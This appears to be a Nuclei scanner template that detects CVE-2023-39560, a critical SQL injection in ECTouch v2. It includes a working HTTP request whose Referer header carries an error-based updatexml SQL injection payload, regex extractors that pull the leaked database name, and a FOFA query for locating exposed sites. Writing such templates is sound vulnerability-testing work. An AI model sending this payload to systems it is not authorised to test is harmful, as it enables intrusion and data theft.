52 lines
1.5 KiB
YAML
52 lines
1.5 KiB
YAML
id: CVE-2023-39560
|
|
|
|
info:
|
|
name: ECTouch v2 - SQL Injection
|
|
author: s4e-io
|
|
severity: critical
|
|
description: |
|
|
ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
|
|
reference:
|
|
- https://wiki.bachang.org/doc/2582/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39560
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-39560
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00139
|
|
epss-percentile: 0.50318
|
|
cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: ectouch
|
|
product: ectouch
|
|
fofa-query: icon_hash="127711143"
|
|
tags: cve,cve2023,ectouch,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "XPATH syntax error: '~[^~]+~'<br>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body
|
|
group: 1
|
|
regex:
|
|
- "XPATH syntax error: '~([a-z0-9]+)~'"
|
|
# digest: 490a0046304402206fd5118214bb1e6d4b5cd9172d048ac3bcc0a6f6e7946f709c98cbd4c3b72e3c0220109355c2a5fac4c24eea2cb504fa0ea62a366177d2a38a909da45992893c0a61:922c64590222798bb761d5b6d8e72950 |